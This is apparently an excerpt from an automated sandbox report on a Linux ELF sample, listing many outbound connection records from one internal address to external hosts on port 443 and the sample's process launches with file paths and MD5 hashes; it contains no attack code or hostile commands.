                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26155192.168.2.2350592201.186.98.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26156192.168.2.2348956191.57.254.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26157192.168.2.2356790169.58.42.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26158192.168.2.2337646128.249.147.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26159192.168.2.234009436.126.237.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26160192.168.2.235297461.120.152.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26161192.168.2.2358490177.57.60.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26162192.168.2.235620476.124.240.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26163192.168.2.2341824160.169.60.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26164192.168.2.2333146190.52.199.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26165192.168.2.2351920181.218.39.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26166192.168.2.235468299.127.137.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26167192.168.2.233838058.217.151.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26168192.168.2.2354570193.111.107.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26169192.168.2.2344222172.132.219.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26170192.168.2.2344352208.191.248.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26171192.168.2.2338442212.245.106.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26172192.168.2.233536890.141.31.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26173192.168.2.2334508177.5.170.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26174192.168.2.233304237.132.231.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26175192.168.2.23457648.134.57.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26176192.168.2.233373294.201.129.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26177192.168.2.2356394165.86.3.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26178192.168.2.2357256147.156.139.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26179192.168.2.2340290120.6.86.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26180192.168.2.2335426160.234.41.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26181192.168.2.2354928209.239.132.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26182192.168.2.2335448164.106.27.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26183192.168.2.2354052143.116.226.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26184192.168.2.2342166129.42.64.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26185192.168.2.2355474121.116.169.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26186192.168.2.2351580123.29.114.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26187192.168.2.2356810207.23.25.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26188192.168.2.233599271.14.40.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26189192.168.2.2342664150.203.73.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26190192.168.2.234401431.184.52.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26191192.168.2.2335908100.219.219.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192192.168.2.2338286181.29.61.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26193192.168.2.2360390150.251.79.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26194192.168.2.2333314106.229.69.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26195192.168.2.2335568165.214.209.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26196192.168.2.2347786121.251.31.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26197192.168.2.2345548124.20.6.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26198192.168.2.23539249.33.190.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26199192.168.2.2352352112.166.173.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26200192.168.2.2333570189.206.15.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26201192.168.2.2337600187.63.226.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26202192.168.2.234850277.163.234.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26203192.168.2.23445864.183.224.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26204192.168.2.2346238205.90.52.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26205192.168.2.236013482.8.255.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26206192.168.2.2348824137.230.179.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26207192.168.2.235193647.159.218.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26208192.168.2.2350990207.140.7.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26209192.168.2.2338474124.102.43.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26210192.168.2.2336984191.255.11.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26211192.168.2.2349870213.185.85.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26212192.168.2.233852657.162.162.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26213192.168.2.2350680106.40.142.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26214192.168.2.2347108203.32.66.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26215192.168.2.2343426141.21.139.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26216192.168.2.235105259.227.1.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26217192.168.2.2346484112.183.33.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26218192.168.2.2337918185.18.236.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26219192.168.2.2335336194.86.241.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26220192.168.2.2340316136.24.80.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26221192.168.2.2341270196.210.121.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26222192.168.2.235511860.33.189.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26223192.168.2.2334054222.192.6.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26224192.168.2.2350308157.18.236.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26225192.168.2.2342510182.196.211.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26226192.168.2.235693089.164.1.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26227192.168.2.2332950194.4.63.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26228192.168.2.2333550120.230.157.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26229192.168.2.234182670.136.208.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26230192.168.2.234021440.225.171.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26231192.168.2.2353510199.163.87.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26232192.168.2.2360784220.201.117.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26233192.168.2.235975289.209.186.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26234192.168.2.2360762184.201.93.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26235192.168.2.2358960115.230.81.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26236192.168.2.2347780198.183.202.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26237192.168.2.2346692128.197.234.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26238192.168.2.2338676184.248.52.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26239192.168.2.235959419.239.239.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26240192.168.2.233743495.231.185.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26241192.168.2.2334624119.3.123.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26242192.168.2.2345864223.232.194.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26243192.168.2.233481047.86.111.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26244192.168.2.2340636129.134.137.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26245192.168.2.2351304202.226.98.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26246192.168.2.234737653.143.98.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26247192.168.2.2344956188.250.170.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26248192.168.2.2353808213.187.64.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26249192.168.2.236092035.108.169.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26250192.168.2.2343518204.95.112.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26251192.168.2.2343478146.220.178.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26252192.168.2.234105435.186.242.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26253192.168.2.2351170150.18.78.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26254192.168.2.2334316121.24.184.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26255192.168.2.2353704177.220.195.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26256192.168.2.2346180111.226.19.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26257192.168.2.2351110156.159.40.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26258192.168.2.2354838184.165.158.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26259192.168.2.2354380112.159.106.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26260192.168.2.2335956137.33.112.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26261192.168.2.2359822138.49.244.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26262192.168.2.235097427.116.94.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26263192.168.2.234225099.227.53.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26264192.168.2.233348087.102.178.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26265192.168.2.2339232207.176.76.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26266192.168.2.2348100147.212.146.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26267192.168.2.233515665.58.105.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26268192.168.2.2352482129.45.128.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26269192.168.2.2338316110.178.247.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26270192.168.2.2347480108.219.152.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26271192.168.2.2358704135.118.128.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26272192.168.2.234292664.216.151.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26273192.168.2.2348206146.146.167.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26274192.168.2.233338493.190.252.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26275192.168.2.234082044.113.67.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26276192.168.2.2360976173.99.237.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26277192.168.2.2339320163.240.228.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26278192.168.2.2337698100.222.217.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26279192.168.2.2349694206.250.61.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26280192.168.2.233458231.29.22.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26281192.168.2.2335654185.82.123.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26282192.168.2.2355556193.235.243.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26283192.168.2.2347190162.204.85.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26284192.168.2.2348680156.58.8.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26285192.168.2.234460418.30.75.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26286192.168.2.235591079.247.220.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26287192.168.2.2343714164.203.232.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26288192.168.2.235203438.15.78.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26289192.168.2.2351980103.84.25.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26290192.168.2.236099850.97.206.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26291192.168.2.2350672100.198.229.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26292192.168.2.2340660126.179.39.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26293192.168.2.234774078.100.136.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26294192.168.2.2345660220.90.99.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26295192.168.2.2332950108.195.16.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26296192.168.2.235181642.214.110.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26297192.168.2.2338298103.181.190.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26298192.168.2.2332926204.92.135.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26299192.168.2.233879840.240.94.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26300192.168.2.235761224.126.47.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26301192.168.2.2336668158.71.215.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26302192.168.2.234701454.194.121.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26303192.168.2.236078623.2.7.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26304192.168.2.2350872102.4.98.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26305192.168.2.235054864.233.165.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26306192.168.2.2340980169.193.221.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26307192.168.2.2350402157.97.20.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26308192.168.2.2354812147.73.204.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26309192.168.2.235135057.6.33.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26310192.168.2.2339860223.91.253.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26311192.168.2.234130488.241.250.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26312192.168.2.2341582210.254.233.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26313192.168.2.2356524160.24.38.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26314192.168.2.2358214144.74.20.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26315192.168.2.2357486150.151.228.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26316192.168.2.234354012.166.83.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26317192.168.2.235730053.132.108.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26318192.168.2.234854489.122.24.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26319192.168.2.2340950118.64.58.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26320192.168.2.234973285.40.156.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26321192.168.2.2349026155.157.176.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26322192.168.2.2335878220.59.201.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26323192.168.2.235566652.213.223.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26324192.168.2.2343032132.172.16.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26325192.168.2.235046823.173.167.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26326192.168.2.2355230151.79.75.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26327192.168.2.2347764199.233.141.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26328192.168.2.2345770162.148.178.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26329192.168.2.2333458119.87.185.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26330192.168.2.233466052.209.29.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26331192.168.2.2352672129.143.236.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26332192.168.2.2339686222.21.176.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26333192.168.2.2359976157.76.12.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26334192.168.2.233836241.34.148.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26335192.168.2.2336688119.22.223.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26336192.168.2.235995461.196.180.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26337192.168.2.2356910101.125.85.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26338192.168.2.2354424140.236.163.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26339192.168.2.2350464147.255.104.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26340192.168.2.2341964148.39.117.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26341192.168.2.2333836112.230.88.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26342192.168.2.234336652.36.41.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26343192.168.2.233336688.126.114.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26344192.168.2.2349798159.126.120.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26345192.168.2.2345326153.3.40.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26346192.168.2.2337448150.125.188.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26347192.168.2.234469232.74.197.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26348192.168.2.2333016152.247.113.638080
                                                TimestampBytes transferredDirectionData


                                                System Behavior

                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62

                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62

                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62

                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62

                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62
                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62
                                                Start time (UTC):09:15:50
                                                Start date (UTC):28/01/2024
                                                Path:/tmp/skyljnee.x86_64-20240128-0910.elf
                                                Arguments:-
                                                File size:155992 bytes
                                                MD5 hash:009e0d9bc08d5d1eccff25abb2c22b62
                                                Start time (UTC):09:15:51
                                                Start date (UTC):28/01/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Start time (UTC):09:15:51
                                                Start date (UTC):28/01/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):09:15:51
                                                Start date (UTC):28/01/2024
                                                Path:/usr/libexec/gsd-print-notifications
                                                Arguments:/usr/libexec/gsd-print-notifications
                                                File size:51840 bytes
                                                MD5 hash:71539698aa691718cee775d6b9450ae2